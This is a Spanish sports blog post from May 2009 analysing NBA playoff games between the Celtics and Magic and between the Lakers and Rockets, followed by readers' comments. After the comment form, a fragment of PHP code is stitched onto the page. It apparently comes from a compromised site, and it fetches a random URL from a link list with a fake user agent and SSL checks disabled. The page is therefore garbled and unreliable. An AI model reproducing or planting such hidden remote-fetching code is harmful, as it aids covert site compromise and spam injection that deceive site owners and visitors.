Playoffs (14/05/2009): Derechos al séptimo infierno

15 de May de 2009 por TheDeerHunter

No podemos quejarnos de igualdad y emoción este año. Dos series más que se van de cabeza al partido de oro. Precisamente las dos de los dos finalistas del año pasado.

Para no faltar a su costumbre, los Celtics fueron los primeros en asegurarse el encuentro que más les gusta, para desgracia de sus seguidores con problemas cardíacos. Lo cierto es que hasta bien entrado el tercer cuarto tenían el partido controlado, pero noooo… Es más divertido jugar un séptimo y se les fue por el desagüe a golpe de pérdidas de balón. Es lo que tiene a veces vivir y morir en manos de Rondo.

Analizando el tema un poco más en serio, Orlando recuperó alguna de sus señas de identidad más importantes. La primera de cajón: Más balones para Howard. No hacía falta ser un genio para darse cuenta, pero vamos, ya hicieron más en ese sentido que en muchos otros partidos. La segunda, una peculiaridad de este equipo. Lanzar mucho a canasta, da igual si bien o regular (vaya telita Redick, blanco y tirador), la eficacia nunca ha sido seña de identidad de este equipo. Lo importante es que el rival lance menos y/o todavía lo haga peor que tú. El gran acierto fue apretarle las tuercas a Davis o Allen y, porqué no decirlo, tener la fortuna de que no entraran algunos tiros que otro día sí hubieran entrado. Todo vale y el Garden arderá el domingo.

Uno casi da gracias de no ser de los Celtics en estos momentos, pero no por ser de los Lakers. Menuda manera de ir al matadero. Increíble lo mal que se puede preparar un partido. Apenas habían pasado 5 minutos y ya perdían de 16, con Scola pareciendo el Shaquille de los mejores tiempos, rozando el doble doble nada más empezar. Y Phill dejando que los jugadores se autogestionen… muy bonito. Un 35% en tiro de autogestión y el caos defensivo más absoluto. Surge la pregunta sobre qué tiene que hacer uno para cobrar una millonada por dejar que otros se autogestionen. La respuesta es ganar 9 anillos antes y tener las espaldas más anchas del estado de California. No es que los Rockets jugaran un baloncesto arrollador, para nada. Scola, Brooks y Landry brillaron, sí… El resto simplemente trabajo y sacrificio. Términos completamente desconocidos en L.A. Son buenos jugadores, ya sabemos, pero no tanto como para no encontrar ninguna manera de pararlos en 10 partidos jugados contra ellos sólo este año. La defensa individual pésima, pero las ayudas incalificables, impropias siquiera de un equipo de playoffs. No exageramos si señalamos que más de 3 cuartas partes de los tiros de Houston fueron sin oposición. A ver cómo se explica eso.

Pero el ataque fue de traca. Tienes a un equipo significativamente superior en altura y te lías a tirar todos los pedrolos del mundo desde el primer segundo. Hubo 3 o 4 jugadas preparadas al poste durante toda la primera parte. En el tercer cuarto se insistió en Gasol como génesis de la jugada y estuvieron a punto de neutralizar la ventaja. Un espejismo, pues el cuerpo les pedía  lanzar de lejos aunque no metieran ni una y así lo hicieron. Hay que morir con las botas puestas, que no se diga. Que no engañen a nadie los 32 puntos de Kobe porque su partido fue horroroso. Gasol tampoco se libra con la manía de continuamente repartir el juego que en este caso debía absorber. Pésima lectura del de Sant Boi anoche.

Dijo del primer partido que no se puede jugar peor al baloncesto. Mentira. Se demostró anoche. Este equipo es capaz de batir todos los registros. Difícil superar lo de anoche pero, dadles tiempo. Ahora de premio partidito a cara o cruz en el Staples, que no es precisamente la cancha del Olimpiakos. Según con el pie que se levanten que a nadie le extrañe nada que se peguen el batacazo. No podemos negar que se lo tendrían merecido.

PREMIOS

MVP: Dwight Howard se sentía infrautilizado en la serie contra Boston y demandó tener más protagonismo. Dicho y hecho. Más balones para Supermán y 23 puntos, 22 rebotes y 3 tapones. A veces los más simple es lo mejor.

Sorpresa: Poca gente esperaba la victoria de Houston esta noche y merece ser destacada. La personificamos en las brillantes actuaciones de Aaron Brooks y Luis Scola, 26 y 24 puntos respectivamente.

Decepción: Obviando el horrible partido de los Lakers, ojito al 2 de 11 y 0 de 7 en triples de Ray Allen.

Esfuerzo en vano: Rajon Rondo anotó 19 puntos, dio 6 asistencias, robó 4 balones y cogió… 16 rebotes!! Hay pívost que en toda su carrera no llegan a esa cifra.

Comenta

8 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Añado y completo… con noticias directas del marca que me hierven la sangre:
    “Phil Jackson: Para nada estoy preocupado” Pero a este tío qué le va a preocupar a estas alturas. Lo clava marca diciendo que el equipo “está construyendo su ruina física y la pérdida de autoestima” Es difícil sentirse ganador cuando cada dos por tres te pasa esto. Y soluciones por parte del técnico, ya las podéis ver en el partido de anoche. Las mismas que ha habido en todas las lecciones tácticas que le llevan pegando algunos desde hace ya algún tiempo. Larry Brown, Rivers… Un poco de amor propio debía de sacar Phill, aunque ya todo le resbale.
    Y tiene las narices de decir: “los Rockets supieron aprovecharse de las perdidas de balón que tuvieron los Lakers” Pero, ¿es ese el análisis que se hace del partido?? ¿fue el problema las pérdidas de balón?? Otro error grave, a mi juicio.

    Y citan a TJ Simers del L.A Times “Sólo estos Lakers podrían hacer que Luis Scola parezca Larry Bird. Este tío irá al Hall of Fame si juega contra Pau Gasol más a menudo” Pero… ¿este capullo vió el mismo partido que yo?? ¿quien narices cubrió a Scola la mayor parte del partido?? Pero si cuando Pau se puso con Scola Landry nos hizo un traje en la segunda parte y Scola apenas intervino en el juego!!!! Vale, Pau hizo un partido pésimo no peor que el del resto del equipo (diría que fue su única esperanza por momentos) pero cargarle el muerto de lo de Scola no tiene puñetero nombre. ¿dónde narices estaban Bynum y Odom??? Vaya cara más dura.

    Y a Ramona Shelburne, del ‘Press Telegram’: “desafortunadamente, Kobe Bryant parece algunas veces el único ‘laker’ implicado”. Sí claro. El único Laker implicado… el gritarle a todo su equipo en todo momento es estar implicado. En una jugada tenía asignado a Battier, le deja que tira completamente sólo y se queda cerrando el rebote en el poste bajo, el tiro es fallado se lo quitan y se gira a gritarle a Gasol que estaba en el lado contrario con su posición cerrada. Bieeeen. Eso es implicación. Lo importante es la pose. Vaya atajo de… ya me cayo.

      Citar

  2. Dantley2 dice:
    #2

    Lo veo desde una perspectiva no Lakers, pero obviamente la diferencia es tan grande que la culpa no puede ser de uno solo. Pero lo has clavado con lo de que a veces lo importante es la pose.

    Y ahora un poco de mundo rosa, Obama (sí, ese que .. uis, no, que este blog no es política) le envió un correo o un sms, algo de eso a Battier felicitándolo por su liderazgo en momentos difíciles. Battier será un gran entrenador si se dedica a eso. Para mí el éxito no es tanto de Brooks/Scola/Artest, que también, sino de Adelman/Battier, son el duo perfecto para sacar el máximo de ese equipo.

      Citar

  3. Travis dice:
    #3

    Vaya ridículo los Lakers hahaha… Sorprende, porque parecían estar mejor que el año pasado, e incluso en la serie contra Jazz se hablaba que habían ganado 4-1 jugando al 50%… Dudo que ahora estén jugando al 50…

    Los celtics bueno, creo que se podían permitir perder este aunque estuvieron a punto de ganarlo (mucha suerte no es que tuvieran, y sí los magic, porque el triple de Turkoglu es de traca). En el garden se gana y ya está. Todavía estoy esperando que Ray Allen entre en esta serie, y no me cabe duda que será en el 7º.

      Citar

  4. Fratila dice:
    #4

    Parece mentira que el mejor conjunto de profesionales del baloncesto mundial actue de esta forma.
    Gasol con falta de agresividad, Kobe no tira del carro.. Odom? Estás ahí?

    Se merecería ganar el anillo otra franquicia más humilde y sin tantas estrellitas, que trabaje más.

      Citar

  5. PIRATA dice:
    #5

    Hay que tener fe, el último anillo de la era Magic Johnson lo ganaron sin ganar un solo partido fuera. (L.A. Times).
    El año pasado jugando mejor nos repasaron en la final, a ver si este año hacemos como los Celtics, sufrir para ganr el anillo.

      Citar

  6. paupelu dice:
    #6

    Boston merece ser finalista de conferencia. Sin Garnett (su pieza clave) están consiguiendo forzar 7 partidos a los Magic de Howard, defendido por Perkins, Davis y compañía.

    Lo de Pau es verdad. Scola hizo un traje a todos, pero a Gasol también. Se le iba por velocidad. Gasol es un defensor aceptable en pívots puros, de movimientos lentos y poco físicos (Dunca, Yao), pero con 4 más rápidos y posibilidades de anotar de fuera (el propio Scola, Garnett, etc) sufre muchísimo.

    No se puede defender lo indefendible.

    http:aplaceinsouth.blogspot.com

      Citar

  7. kantonyo dice:
    #7

    Partidazo de Gasol para decidir la eliminatoria, esperemos que esto le haya callado las bocas a muchos en USA, aunque parece que no perderan la oportunidad de un mal partido del catalan para catalogarle como blando…..

    Pau Gasol ha dado un paso adelante para convertirse en uno de los mejores jugadores europeos de la historia y uno de los jugadores mas decisivos actualmente en la NBA.

    Hay posibilidades para que se convierta en el jugador más valioso de la final de la NBA, si los Lakers ganan el campeonato, ya que no veo a Kobe a su mejor nivel.

      Citar

  8. TheDeerHunter dice:
    #8

    @Paupelu,
    Para mí lo indefendible es responsabilizar exclusivamente a Gasol de la destroza que hizo Scola el otro día cuando no se ocupó de él más que en momentos puntuales. Sus defensores asignados eran Odom y Bynum, y sólo en acciones concretas Gasol.

    Ahora, siendo oportunista… anoche el baño defensivo se lo llevó Scola y esta vez sí se ocupó Gasol exclusivamente de él. Ahora que digan que Scola sería Larry Bird si siempre se enfrentara a Gasol.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>